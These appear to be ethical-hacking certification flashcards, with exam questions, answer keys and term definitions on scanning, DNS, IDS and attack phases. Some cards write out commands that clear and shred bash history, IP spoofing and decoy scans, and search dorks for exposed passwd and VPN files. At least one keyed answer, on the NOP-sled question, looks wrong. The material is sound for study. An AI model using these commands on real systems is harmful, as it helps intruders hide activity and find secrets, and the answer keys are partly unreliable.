Alice frequents coffee shops, libraries, and other public areas where your company's remote employees typically work. Alice knows that the username and password employees use to log in to their laptops are the same credentials used to access the company's virtual private network (VPN). When an employee first arrives and pulls out a laptop, Alice will position herself in a seat behind that employee. When the employee enters the login credentials to unlock the laptop, Alice will look over the employee's shoulder to see the username and which keys are typed for the password. What should the company do to prevent this shoulder surfing attack? A)Purchase and distribute privacy filter screens to remote employees. B)Implement and require full disk encryption for new and existing laptops. C)Apply asset tags with the text "Look over your shoulder!" on new laptops. D)Create and enforce a physical security policy for remote employees.

secretly track

All In One Keylogger allows you to ___ all activities from all computer users and automatically receive logs to a desired email/FTP/LAN accounting

exploit vulnerabilities

Attackers try various tools and attack techniques to ______ in a computer system or security policy and controls to achieve their motives

A)127.0.0.1

After a recent malware infection, one of the devices in your network is found to be continually changing its LAN connection settings to use itself as a proxy server. It resides in the 192.168.1.0/24 network. Which IP address will be used on the device for the proxy server? A)127.0.0.1 B)255.255.255.255 C)192.168.1.1 D)192.168.1.255

C)Installing a driver

After successfully executing a buffer overflow attack on a Windows machine, which of the following actions is NOT allowed in the security context of the LOCAL_SYSTEM account? A)Spawning a shell B)Changing the time zone C)Installing a driver D)Debugging an application

B) ACK

After the three-way handshake, which flag is set in packets sent in either direction? A) SYN B) ACK C) FIN D) XMAS

www.networksolutions.com www.godaddy.com www.register.com

After you have your IP address number and want to register your name where can you go?

content monitoring services up-to-date information

Alerts are the ____ that provide ____ based on your preference usually via email or SMS in an automated manner.

D)Allan will be unable to establish an interactive session

Allan has completed the following steps in an attempt to hack a web application: -Obtained a valid session ID token via an XSS vulnerability -Confirmed that the session ID manager validates the source IP address as well -Spoofed the required IP address -Replayed the session ID What will be the result? A)The session ID manager will create a new session ID B)The session ID manager will determine the address is spoofed C)Allan will be able to establish an interactive session D)Allan will be unable to establish an interactive session

InSpy

Attackers use ___ utility, which performs enumeration on LinkedIn and finds people based on job title, company, or email address

A. DNSRV1.anycomp.com, 3600 seconds

An SOA record gathered from a zone transfer is shown here: @ IN SOA DNSRV1.anycomp.com. postmaster.anycomp.com. ( 4 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 3600 ) ; min TTL [1h] What is the name of the authoritative DNS server for the domain, and how often will secondary servers check in for updates? A. DNSRV1.anycomp.com, 3600 seconds B. DNSRV1.anycomp.com, 600 seconds C. DNSRV1.anycomp.com, 4 seconds D. postmaster.anycomp.com, 600 seconds

B. The administrator is configuring IP masquerading.

An administrator enters the following command on a Linux system: iptables -t nat -L Which of the following best describes the intent of the command entered? A. The administrator is attempting a port scan. B. The administrator is configuring IP masquerading. C. The administrator is preparing to flood a switch. D. The administrator is preparing a DoS attack.

B)tcpd

An administrator has configured SMTP and HTTP services running on a FreeBSD server. She wants to allow standard email and web traffic across registered ports 25, 80, and 443. However, any unauthorized access should be logged and denied. Which daemon should you use for logging and simple access control? A)smtpd B)tcpd C)httpd D)asmtpd

antivirus (AV) software

An application that monitors a computer or network to identify, and prevent, malware. ___ is usually signature-based and can take multiple actions on defined malware files/activity.

Zero-Day Attack

An attack that exploits computer application vulnerabilities before the software developer releases a patch for the vulnerability

Operating system (OS) attack

An attack that exploits the common mistake many people make when installing operating systems--that is, accepting and leaving all the defaults.

Active attack

An attack that is direct in nature -- usually where the attacker injects something into, or otherwise alters, the network or system target.

cross-site scripting (XSS)

An attack whereby the hacker injects code into an otherwise legitimate web page, which is then clicked by other users or is exploited via Java or some other script method. The embedded code within the link is submitted as part of the client's web request and can execute on the user's computer.

exploit the applicaitons

An attacker can ___ with the setuid or setgid flags to execute malicious code with elevated privileges

B)FQDNs of all intermediary devices

An attacker is using the traceroute tool to carry out network footprinting. Which of the following may NOT be discovered using this tool? A)Structure of the network B)FQDNs of all intermediary devices C)IP addresses of routers and firewalls D)IP addresses of internal computers

Track company's online reputation Collect company's search engine ranking information Obtain email notifications when a company is mentioned online Track conversations Obtain social news about the target organization

An attacker makes use of ORM tracking tools to:

B)Decreases the packet send frequency of the scan

An attacker recently used Nmap to SYN scan your network. You discover that he adjusted the timing options of the scan, thereby avoiding detection by your network intrusion detection system (IDS). How does adjusting the timing options affect the Nmap scan? A)Identifies the operating systems being used on the network B)Decreases the packet send frequency of the scan C)Generates scanning decoys on the network D)Determines which network hosts are not available

A. The HTML file has permissions of read only

An attacker successfully executes a buffer overflow against an IIS web server. He spawns an interactive shell with plans to deface the main web page. An attempt to use the echo command to overwrite index.html does not work, and an attempt to delete the page altogether also fails. Additionally, an attempt to copy a new page in its place also fails. What is the probable cause of the attacker's problem? A. The HTML file has permissions of read only B. A buffer overflow attack cannot deface a web page C. The LOCAL_SYSTEM privilege level is insufficient for the attempts D. The server is using Kerberos authentication

B)Network sniffer

An attacker wants to be able to implement a man-in-the-middle (MITM) attack to capture authentication tokens used on a corporate network. Which type of tool would he use? A)Port scanner B)Network sniffer C)Penetration tester D)Vulnerability scanner

black hat

An attacker who breaks into computer systems with malicious intent, without the owner's knowledge or permission.

D)HR department

An employee has been found to be in direct violation of the company's security policy. When you inform him of the policy, he claims to know nothing about it. You need to find out if he was made aware of the security policy. Which entity should be able to confirm this? A)IT department B)Legal department C)Upper management D)HR department

Banner grabbing

An enumeration technique used to provide information about a computer system; generally used for operating system identification (also known as fingerprinting).

Annualized rate of occurrence (ARO)

An estimate of the number of times during a year a particular asset would be lost or experience downtime.

A. The port is filtered at the firewall.

An ethical hacker is ACK-scanning against a network segment he knows is sitting behind a stateful firewall. If a scan packet receives no response, what does that indicate? A. The port is filtered at the firewall. B. The port is not filtered at the firewall. C. The firewall allows the packet, but the device has the port closed. D. It is impossible to determine any port status from this response.

A. A white hat is attempting a black-box test

An ethical hacker is given no prior knowledge of the network and has a specific framework in which to work. The agreement specifies boundaries, nondisclosure agreements, and a completion date definition. Which of the following statements is true? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.

ike-scan

Attackers can probe further using a tool such as ___ to enumerate the sensitive information including encryption and hashing algorithm, authentication type, key distribution algorithm, SA LifeDuration, etc.

A. A white hat is attempting a black-box test.

An ethical hacker is hired to test the security of a business network. The CEH is given no prior knowledge of the network and has specific framework in which to work, defining boundaries, nondisclosure agreements, and the completion date. Which of the following is a true statement? A. A white hat is attempting a black-box test. B. A white hat is attempting a white-box test. C. A black hat is attempting a black-box test. D. A black hat is attempting a gray-box test.

C. Stealth

An ethical hacker is sending TCP packets to a machine with the SYN flag set. None of the SYN/ACK responses on open ports is being answered. Which type of port scan is this? A. Ping sweep B. XMAS C. Stealth D. Full

Source routing

An ethical hacker sends a packet with a deliberate and specific path to its destination. What technique is the hacker using?

C. Split DNS

An organization has a DNS server located in the DMZ and other DNS servers located on the intranet. What is this implementation commonly called? A. Dynamic DNS B. DNSSEC C. Split DNS D. Auto DNS

C) Core Impact D) CANVAS

An organization wants to save time and money and decides to go with an automated approach to pen testing. Which of the following tools would work for this? (Choose two) A) Nmap B) Netcat C) Core Impact D) CANVAS

business impact analysis (BIA)

An organized process to gauge the potential effects of an interruption to critical business operations as a result of disaster, accident, or emergency.

Data Encryption Standard (DES)

An outdated symmetric cipher encryption algorithm, previously U.S. government-approved and used by business and civilian government agencies. It is no longer considered secure because of the ease with which the entire keyspace can be attempted using modern computing, thus making cracking the encryption easy.

asset

Any item of value or worth to an organization, whether physical or virtual.

Improper data/input validation Authentication and Authorization attacks Security misconfiguration Information disclosure Broken session management Buffer overflow issues Cryptography attacks SQL injection Improper error handling and exception management

Application Threats

weaknesses and misconfigurations

Applications include many ___ like unquoted paths, path environment variable misconfiguration, and searchorder hijacking that lead to path interception

Link local

Applies only to hosts on the same subnet

UDP Scanning

Are you open on UDP Port 29 --> <-- No response if port it Open or <-- If port is closed, an ICMP Port unreachable message is received

fragmented packets

Attackers can use Colasoft Packet Builder to create ____ to bypass firewalls and IDS systems in a network

encode malicious content

Attackers can use DNS tunneling to ___ or data of other programs within DNS queries and replies

B. ICMP is being filtered.

As a pen test on a major international business moves along, a colleague discovers an IIS server and a mail exchange server on a DMZ subnet. You review a ping sweep accomplished earlier in the day on that subnet and note neither machine responded to the ping. What is the most likely reason for the lack of response? A. The hosts might be turned off or disconnected. B. ICMP is being filtered. C. The destination network might be down. D. The servers are Linux based and do not respond to ping requests.

B. Passive

As a pen test team member, you begin searching for IP ranges owned by the target organization and discover their network range. You also read job postings and news articles and visit the organization's website. Throughout the first week of the test, you also observe when employees come to and leave work, and you rummage through the trash outside the building for useful information. Which type of footprinting are you accomplishing? A. Active B. Passive C. Reconnaissance D. None of the above

B)Creates a binary log file in a specific folder.

As a security professional for your company, you must perform routine network analysis. Today you must perform a traffic capture using tcpdump. You run the tcpdump -w /log command. What does this command do? A)Captures the packets from a particular host. B)Creates a binary log file in a specific folder. C)Reads packets from a specific folder. D)Captures the packets on a specific interface.

B. Privacy Act

As part of a pen test on a U.S. government system, you discover files containing Social Security numbers and other sensitive personally identifiable information (PII) information. You are asked about controls placed on the dissemination of this information. Which of the following acts should you check? A. FISMA B. Privacy Act C. PATRIOT Act D. Freedom of Information Act

B)Network administrator issues RFID cards for the server room and reviews the door logs

As part of a security audit, your team is looking for common security design issues. In which scenario would applying the segregation of duties principle enhance security? A)IT techs have passwords of 5 characters, while users have passwords of 12 characters B)Network administrator issues RFID cards for the server room and reviews the door logs C)Sales group both creates marketing materials and edits the materials D)User is allowed to install his own software and attach hardware to his computer

A. Gray box

As part of the preparation phase for a pen test you are participating in, the client relays their intent to discover security flaws and possible remediation. They seem particularly concerned about internal threats from the user base. Which of the following best describes the test type the client is looking for? A. Gray box B. Black box C. White hat D. Black hat

C)Active port scanning on 10.1.1.119

As part of your job duties, you must regularly review the log files for several servers on your network. Recently while reviewing the log files for a server with the IP address of 10.1.1.119, you see the following events: Time: Dec 28 02: 12: 48 Port: 20 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 12: 54 Port: 21 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 01 Port: 22 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 07 Port: 23 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 15 Port: 25 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 21 Port: 80 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Time: Dec 28 02: 13: 24 Port: 110 Source: 10.1.1.26 Destination: 10.1.1.119 Protocol: TCP Which activity occurred according to these entries? A)Active port scanning on 10.1.1.26 B)DoS attack against 10.1.1.26 C)Active port scanning on 10.1.1.119 D)DoS attack against 10.1.1.119

router

As the packet travels through the nodes in the network, each ___ examines the destination IP address and chooses the next hop to direct the packet to the destination

C)www.netcraft.com

As your company's ethical hacker, you often perform routine penetration tests to check the security for your company's network. Last week, an attacker posted details obtained through operating system fingerprinting about your company's servers. You need to perform the same type of check to verify what information is available. Which tool should you use? A)www.webextractor.com B)www.changedetection.com C)www.netcraft.com D)www.whois.com

Encrypted HTTPS protocol to send exploits to the Web server

As your company's security practitioner, you are responsible for overall network security, which includes an IDS and a firewall. In addition, you must ensure that the company's Web server is protected. Your company's Web server has been the target of an advanced persistent threat (APT). The IDS log files do not show any intrusion attempts, but the Web server constantly locks up and requires constant rebooting. After the latest incident, you review the firewall logs and notice a large number of SSL request packets. You decide to implement the following security measures: Install a proxy server and terminate SSL at the proxy Install a hardware SSL accelerator and terminate SSL at that layer. What is the best description of the attack vector? A)Encrypted HTTPS protocol to send exploits to the Web server B)Encrypted IPSec protocol to send exploits to the firewall C)Encrypted IPSec protocol to send exploits to the Web server D)Encrypted HTTPS protocol to send exploits to the firewall

Confidentiality

Assurance that the information is accessible only to those authorized to have access

Availability

Assurance that the systems responsible for delivering, storing, and processing information are accessible when required by the authorized users

Network (Layer 3)

At which layer of the OSI model do packet filtering firewalls operate?

Application (Layer 7)

At which layer of the OSI model do proxy servers operate?

Application layer (Layer 7)

At which layer of the OSI model does a cross-site scripting attack occur?

determine key hosts in the network

Attackers can gather DNS information to _____ and can perform social engineering attacks.

exfiltrate stolen confidential

Attackers can make use of this back channel to ___ or sensitive information from the server using DNS tunneling

spoofed tokens

Attackers can obrain access tokens of other users or generate ___ to escalate privileges and perform malicious activities by evading detection

cat /dev/null > ~.bash_history && history -c && exit

BASH Clearing the user's complete history

export HISTSIZE=0

BASH Disabling history

shred ~/.bash_history (Shreds the history file, making its content unreadable) shred ~/.bash_history && cat /dev/null > .bash_history && history -c && exit (Shreds the history file and clear the evidence of the command)

BASH Shredding the history

disaster recovery plan (DRP)

BCPs include a ___ that addresses exactly what to do to recover any lost data or services.

1) Intimate employees about what you collect, why and what you will do with it 2) Keep employees' personal information accurate, complete, and up-to-date 3) Limit the collection of information and collect it by fair and lawful means 4) Provide employees access to their personal information 5) Inform employees about the potential collection, use, and disclosure of personal information 6) Keep employees' personal information secure

Basic Rules for Privacy Policies at Workplace

integrity

Bit flipping is one form of an ___ attack.

- Check for Live Systems - Check for Open Ports - Scanning Beyond IDS - Banner Grabbing - Scan for Vulnerability - Draw Network Diagrams - Prepare Proxies - Scanning Pen Testing

CEH Scanning Methodology

Information Systems Audit and Control Association (ISACA) and IT Governance Institute (ITGI)

COBIT (Control Objects for Information and Related Technology was created by what?

Planning and organization Acquisition and implementation Delivery and support Monitoring and evaluation

COBIT categorizes control objectives into what domains?

No

Can you compete the three-way handshake and open a successful TCP connection with spoofed IP addresses

Sniffing the network traffic

Capturing and analyzing packets from the target enables an attacker to determine OS used by the remote system

Tails

Censorship Circumvention Tool

C) APR poisoning

Certain switches provide several security features. What would enabling DHCP snooping help to prevent against this? A) MAC flooding B) DNS flooding C) APR poisoning D) DNS poisoning

B. The host is most likely a printer or has a printer installed.

Consider the ports shown in the nmap output returned on an IP scanned during footprinting: PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/tcp open netbios-ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 01:2A:48:0B:AA:81 Which of the following is true regarding the output? A. The host is most likely a router or has routing enabled. B. The host is most likely a printer or has a printer installed. C. The host is definitely a Windows Server. D. The host is definitely a Linux Server.

White hats

Considered the good guys, these are the ethical hackers, hired by a customer for the specific goal of testing and improving security or for other defensive purposes. Need prior consent. Also known as security analysts.

corrective controls

Controls internal to a system designed to resolve vulnerabilities and errors soon after they arise.

CCleaner DBAN Privacy Eraser Wipe BleachBit ClearProg

Covering Tracks Tools

plists

Daemons have ___ that are linked to executables that run at start up

Source Port -- Destination Port Sequence Number Acknowledgment Number Offset - Reserved - Flags - Window Checksum Options - Padding Data

Describe the TCP segment structure

SYN Seguence #105 <----------- SYN/ACK (Your) Sequence #106 (My) Sequence #223 ---------------> ACK (Your) Sequence #224 (My) Sequence #106

Describe the three-way handshake.

StegoStick StegJ Office XML SNOW Data Stash Hydan

Document Steganography Tools

authenticity

Digital signatures can be used to guarantee the ___ of the person sending a message.

Attacker: --> Target Sending packet with spoofed 10.0.0.5 IP-TTL 13 Target --> Real IP Sending a packet to 10.0.0.5 IPO Real IP --> Target Reply from real 10.0.0.5 IP-TTL 25

Direct TTL Probe flow

site:domain or web page string example: site:anywhere.com passwds

Displays pages for a specific website or domain holding the search term.

index of/string example: "intitle:index of" passwd

Displays pages with directory browsing enabled, usually used with another operator.

inurl:string example: inurl:passwd example: allinurl: etc passwd

Displays pages with the string in the URL.

live machines port port status OS details device type system uptime

During the Scanning Phase what type of information can be extracted?

C)Results of past audits as examples of previous work

During the presentation of bids for penetration testing work, which of the following additions to a proposal would be unethical to submit? A)Suggestions of testing formats that worked in the past B)Letters of recommendation from former customers C)Results of past audits as examples of previous work D)Time estimates based on previous experience

A)Assign read-only permission to all HTML files and folders for the www-data group

During vulnerability assessment, you rank the public-facing website as an integral asset to the company's continued reputation and revenue. But there are several potential threats to the Apache HTTP Server that hosts the website. The static webpages in particular could be vulnerable to defacement. Which security control should you implement? A)Assign read-only permission to all HTML files and folders for the www-data group B)Assign write permissions to the web root for only the www-data group C)Assign write-only permission to all HTML files and folders for the www-data group D)Assign read and write permissions to the web root for only the www-data group

A)Pre-Attack

During which phase of security testing is a non-disclosure agreement (NDA) executed? A)Pre-Attack B)Attack C)Post Attack D)Recon

-By default, LDAP traffic is transmitted unsecured; use SSL or STARTTLS technology to encrypt the traffic -Select a user name different from your email address and enable account lockout

Enumeration Countermeasres for LDAP

-Disable SMB protocol on Web and DNS Servers -Disable SMB protocol on Internet facing servers -Disable ports TCP 139 and TCP 445 used by the SMB protocol -Restrict anonymous access through RestrictNullSessAccess parameter from the Windows Registry

Enumeration Countermeasures for SMB

Configure SMTP servers to: -Ignore email messages to unknown recipients -Not to include sensitive mail server and local host information in mail responses -Disable open relay feature -Limit the number of accepted connections from a source in order to prevent brute force attacks

Enumeration Countermeasures for SMTP

ICMP Type 3 Code 10

Error message - Host administratively prohibited

ICMP Type 3 Code 7

Error message - Host unknown

ICMP Type 3 Code 9

Error message - Network administratively prohibited

ICMP Type 3 Code 6

Error message - Network unknown

Banner grabbing from error messages

Error messages provide information such as type of server, type of OS, and SSL tool used by the target remote system

verify the existence of exploitable vulnerabilities

Ethical hacking focuses on simulating techniques used by attackers to _____ in the system security

identify vulnerabilities

Ethical hacking involves the use of hacking tools, tricks, and techniques to ______ so as to ensure system security

B. The capture shows step 2 of a TCP handshake.

Examine the Snort output shown here: 08/28-12:23:13.014491 01:10:BB:17:E3:C5 -> A5:12:B7:55:57:AB type: 0x800 len: 0x3C 190.168.5.12:33541 -> 213.132.44.56:23 TCP TTL:128 TOS: 0x0 ID:12365 IpLen:20 DgmLen:48 DF ***A**S* Seq: 0xA153BD Ack: 0xA01657 Win: 0x2000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOPSackOK 0x000: 00 02 B3 87 84 25 00 10 5A 01 0D 5B 08 00 45 00 .%..Z..[..E. 0x0010: 00 30 98 43 40 00 80 06 DE EC C0 A8 01 04 C0 A8 .0.C@... 0x0020: 01 43 04 DC 01 BB 00 A1 8B BD 00 00 00 00 70 02 .C....p. 0x0030: 20 00 4C 92 00 00 02 04 05 B4 01 01 04 02 .L..... Which of the following is true regarding the packet capture? A. The capture indicates a NOP sled attack. B. The capture shows step 2 of a TCP handshake. C. The packet source is 213.132.44.56. D. The packet capture shows an SSH session attempt.

A. One hour

Examine the following SOA record: @ IN SOARDNSRV1.somebiz.com. postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] How long will the secondary server wait before asking for an update to the zone file? A. One hour B. Two hours C. Ten minutes D. One day

B. This rule will alert on packets coming from outside the designated home address. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.

Examine the following Snort rule: alerttcp !$HOME_NET any -> $HOME_NET 23 (content: "admin"; msg: "Telnet attempt..admin access";) Which of the following are true regarding the rule? (Choose all that apply.) A. This rule will alert on packets coming from the designated home network. B. This rule will alert on packets coming from outside the designated home address. C. This rule will alert on packets designated for any port, from port 23, containing the "admin" string. D. This rule will alert on packets designated on port 23, from any port, containing the "admin" string.

A. The operator is enumerating a system named someserver.

Examine the following command sequence: C:\> nslookup Default Server: ns1.anybiz.com Address: 188.87.99.6 > set type=HINFO > someserver Server: resolver.anybiz.com Address: 188.87.100.5 Someserver.anybiz.com CPU=Intel Quad Chip OS=Linux 2.8 Which of the following best describes the intent of the command sequence? A. The operator is enumerating a system named someserver. B. The operator is attempting DNS poisoning. C. The operator is attempting a zone transfer. D. The operator is attempting to find a name server.

B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com.

Examine the following command-line entry: C:\>nslookup Default Server: ns1.somewhere.com Address: 128.189.72.5 > set q=mx > mailhost Which statements are true regarding this command sequence? (Choose two.) A. Nslookup is in non-interactive mode. B. Nslookup is in interactive mode. C. The output will show all mail servers in the zone somewhere.com. D. The output will show all name servers in the zone somewhere.com

Comments in the source code Contact details of web developer or admin File system structure Script type

Examining HTML source provides what kind of information?

Access Control Policy Remote-Access Policy Firewall-Management Policy Network-Connection Policy Passwords Policy User-Account Policy Information-Protection Policy Special-Access Policy Email Security Policy Acceprable-Use Policy

Examples of Security Policies

Facial images Fingerprints Handwriting samples

Examples of biometrics

filetype:rcf inurl:vpn

Finds Sonicwall Gloval VPN Client files containing sensitive information and login

filetype:pcf vpn OR Group

Finds publicly accessible profile configuration files (.pcf) used by VPN clients

SYN sequence number

First, a session must be established between the two systems. To do this, the sender forwards a segment with the ___ flag set, indicating a desire to synchronize a communications session. This segment also contains a ____ -- a pseudo-random number that helps maintain the legitimacy and uniqueness of this session.

-Restrict the employees to access social networking sites from organization's network - Configure web servers to avoid information leakage - Educate employees to use pseudonyms on blogs, groups, and forums - Do not reveal critical information in press releases, annual reports, product catalogues, etc - Limit the amount of information that you are publishing on the website/Internet - Use footprinting techniques to discover and remove any sensitive information publicly available - Prevent search engines from caching a web page and use anonymous registration services

Footprinting Countermeasures

- Enforce security policies to regulate the information that employees can reveal to third parties - Set apart internal and external DNS or use split DNS, and restrict zone transfer to authorized servers - Disable directory listings in the web servers - Educate employees about various social engineering tricks and risks - Opt for privacy services on Whois Lookup database -Avoid domain-level cross-linking for the critical assets - Encrypt and password protect sensitive information

Footprinting Countermeasures (cont'd)

Maltego Recon-ng FOCA Prefix Whois Netmask NetScanTools Pro Binging Tctrace SearchBug Autonomous System Scanner (ASS) TinEye DNS-Digger Robtex Dig Web Interface SpiderFoot White Pages NSlookup Email Tracking Tool Zaba Search yoName GeoTrace Ping-Probe DomainHostingView MetaGoofil GMapCatcher Wikto SearchDiggity SiteDigger Google HACK DB Google Hacks Gooscan BiLE Suite Trellian

Footprinting Tools

pen testing

Footprinting ____ is used to determine organization's publicly available information

security posture

Footprinting allows attackers to know the ___ of the target organizaiton

Facebook Linkedin Twitter Google+ Pinterest

Gather target organization employees information from their personal profiles on social networking sites such as ____ , etc. that assist to perform social engineering

Market value of a company's shares Company profile Competitor details

Gathering Information from Financial Services provides what kinds of information?

nmap -D RND:10 [target]

Generates a random number of decoys using Nmap

A. SYN, SYN/ACK, ACK

Given the following Wireshark filter, what is the attacker attempting to view? ((tcp.flags == 0x02) || (tcp.flags == 0x12)) || ((tcp.flags == 0x10) && (tcp.ack==1) && (tcp.len==0)) A. SYN, SYN/ACK, ACK B. SYN, FIN, URG, and PSH C. ACK, ACK, SYN, URG D. SYN/ACK only

A)Generate a banner that describes what service is running on port 443 if it is open

Given this command: telnet 192.168.5.5 443 What will it do? A)Generate a banner that describes what service is running on port 443 if it is open B)Close all open Telnet sessions in 4 minutes and 43 seconds C)Open a Telnet session with the device at 192.168.5.5 in 4 minutes and 43 seconds D)Test the Telnet connection every 443 seconds and sends an alert if it doesn't answer

TCP/UDP 3268

Global Catalog Service

hidden storage

GrayFish is a Windows kernel rootkit that runs inside the Windows operating system and provides an effective mechanism, ___, and malicious command execution while remaining invisible

Non-Repudiation

Guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message

modifying system application features

Hacking involves ___ or ___ to achieve a goal outside of the creator's original purpose

-Open Local Group Policy Editor and navigate to Local Computer Policy --> Computer Configuration --> Administrative Templates --> Network --> DNS Client -In DNS client, double-click on Turn off multicast name resolution -Select the Disabled radio button and then click OK

How do you disable LMBNR

-Open Control Panel and navigate to Network and Internet --> Network and Sharing Center and click on Change adapter settings option present on the right side -Right-click on the network adapter and click Properties, select TCP/IPv4 and then click Properties -Under General tab, go to Advanced --> WINS -From the NetBIOS options, check "Disable NetBIOS over TCP/IP" radio button and click OK

How do you disable NBT-NS

1) Connect to the SOA 2) Enter nslookup at the command line. 3) Type server <IPAddress>, using the IP address of the SOA. Press ENTER. 4) Type ls -d domainname.com, where domainname.com is the name of the zone, and then press ENTER.

How do you do a zone transfer with nslookup?

Open the snort.config file and comment out all of the rules you do not wish to use

How do you prevent rule files from loading when snort is started?

1) nslookup 2) server servername

How do you switch to your target's server using nslookup?

Uses a word list based on variations of dictionary words to discover the password

How does a hybrid password attack work? A)Uses different known factors about the user, such as date of birth, license number, and other personally identifiable information (PII) to discover the password B)Uses every possible combination of letters, numbers, and special characters to discover the password C)Uses a word list based on variations of dictionary words to discover the password D)Uses a dictionary input list to discover the password

B)Hides message with whitespace

How does the tool SNOW facilitate the use of steganography? A)Hides files with folders B)Hides message with whitespace C)Hides messages in graphics D)Hides messages in carrier files

16 bits long

How long is the field for port numbers?

Disable LMBNR Disable NBT-NS

How to Defend against LLMR/NBT-NS Poisoning

1) To delete NTFS streams, move the suspected files to FAT partition 2) Use third-party file integrity checker such as Tripwire File Integrity Monitoring to maintain integrity of an NTFS partition files 3) Use programs such as Stream Detector, LADS, ADS Detector, etc. to detect streams 4) Enable real-time antivirus scanning to protect against execution of malicious streams in your sytem 5) Use up-to-date antivirus software on your system

How to Defend against NTFS Streams

1) Reinstall OS/applications from a trusted source after backing up the critical data 2) Well-documented automated installation procedures need to be kept 3) Perform kernel memory dump analysis to determine the presence of rootkits 4) Harden the workstation or server against the attack 5) Educate staff not to download any files/programs from untrusted sources 6) Install network and host-based firewalls 7) Ensure the availability of trusted restoration media 8) Update and patch operating systems and applicaitons 9) Verify the integrity of system files regularly using cryptographically strong digital fingerprint technologies 10) Update antivirus and anti-spyware software regularly 11) Avoid logging in an account with administrative privileges 12) Adhere to the least privilege principle 13) Ensure the chosen antivirus software posses rootkit protection 14) Do not install unnecessary applications and also disable the features and services not in use

How to defend against Rootkits

-Q --seqnum

Hping option used in order to collect sequence numbers generated by the target host

-2

Hping sets UDP mode

-9

Hping sets in listen mode, to trigger on a signature argument when it sees it come through.

-8

Hping sets scan mode, expecting an argument for the ports to be scanned (single, range 1-1000)

-A

Hping sets the ACK flag

-F

Hping sets the FIN flag

-P

Hping sets the PSH flag

-R

Hping sets the RST flag

-X

Hping sets the XMAS scan flags.

--flood

Hping will send packets as fast as possible, without taking care to show incoming replies.

Habits

Human beings tend to follow set patterns and behaviors known as ____.

Email Security Policy

It is created to govern the proper usage of corporate email

Direct TTL Probes IP Identification Number TCP Flow Control Method

IP Spoofing Detection Techniques

was Internet Assigned Numbers Authority (IANA) now Internet Corporation for Assigned Names and Numbers (ICANN)

IP address management is done through what?

Layer 3 Network

IP resides at what layer of the OSI model?

Hping2 www.certifiedhacker.com -a 7.7.7.7

IP spoofing using Hping2

127.0.0.1

IPv4 loop back address

32 bits 128 bits

IPv6 increases the IP address size from __ to __, to support more levels of addressing hierarchy

UDP 500

ISAKMP/Internet Key Exchange (IKE)

NIDS and HIDS

If a ping sweep is not done properly or to fast what systems can detect it?

inject a malicious dylib

If attackers can ___ in one of the primary directories, it will be executed in place of the original dylib

stateful firewall

If doing an ACK flag probe and there is no response, this indicates a ____ is between the attacker and the host.

higher

If the SN (Serial Number) is ___ than that of the secondary, it's time to update).

port is open

If the TTL value of RST packet on particular port is less than the boundary value of 64, then that ___

Port is closed

If the TTL value of RST packet on particular port is more than the boundary value of 64, the that ___

is open

If the WINDOW value of RST packet on particular port has non zero value, then that port __

replace the target binary

If the file system permissions of binaries are not properly set, an attacker can ___ with a malicious file

replace redundant bits of image

Image steganography tools ___ data with the message in such a way that the effect cannot be detected by human eyes

D)Encrypting the data exchanged

In a hybrid PKI model, which function is performed by the symmetric algorithm? A)Encrypting the symmetric key exchanged B)Authenticating the remote device C)Exchanging the keys D)Encrypting the data exchanged

Logical safeguards

In a risk assessment, event logging and password management are examples of which type of safeguard?

Physical safeguards

In a risk assessment, facility access control and equipment inventory are examples of which type of safeguard?

B. Visit www.archive.org and see whether the old copy is available

In gathering information about a potential target, you carry out a social engineering attacks against employees. In eavesdropping, you overhear an employee conversation about a sensitive document that was inadvertently posted to the company website and remained on the site for a few days but was later removed. In checking the website, you find the document has indeed been removed, what is a possible solution to finding the document? A. Install Black Widow and copy the website to your machine; the page may simply be hidden B. Visit www.archive.org and see whether the old copy is available C. Attempt a SQL injection attack against the site D. None of the above. It is impossible to recover

B. The attacker is attempting a password crack D. The attacker is attempting to launch a command line shell

In the output of a network IDS capture you notice a large number of 0x90 values, with "/bin/sh" also appearing in the ACII part of the output. Which of the following are the most accurate assumptions based on these observations? (Choose Two) A. The attacker is attempting a buffer overflow B. The attacker is attempting a password crack C. The attacker is attempting a session hijack D. The attacker is attempting to launch a command line shell

XML denial of service

In what type of attack does the attacker craft an XML message with very large payloads, recursive content, excessive nesting, malicious external entities, or with malicious DTDs (Data Type Documents)?

Cover tracks

In which CEH system hacking stage do you clear the security log?

Escalate privileges

In which CEH system hacking stage do you dump the SAM file?

Executing applications

In which CEH system hacking stage do you execute the payload?

Cracking passwords

In which CEH system hacking stage do you use Brutus?

D. Parameter Manipulation

In which attack would a hacker modify the URL in the web browser's address field to attempt to gain access to resources they're not supposed to be able to view? A. SQL injection B. XSS C. Brute Force D. Parameter Manipulation

Conclusion

In which phase of Software Assurance Maturity Model do you advise corrective action?

Preparation

In which phase of Software Assurance Maturity Model do you execute a formal contract that guarantees non-disclosure of the client's data and legal protection for the tester?

Conduct

In which phase of Software Assurance Maturity Model does the tester look for potential vulnerabilities?

Maintaining Access

In which phase of an attack are rootkits installed and unpatched systems taken advantage?

Gaining Access

In which phase of an attack are the systems breeched, malicious code planted and backdoors opened?

B. Scanning and enumeration

In which phase of the ethical hacking methodology would a hacker be expected to discover available targets on a network? A. Reconnaissance B. Scanning and enumeration C. Gaining access D. Maintaining access E. Covering tracks

B. Scanning and enumeration

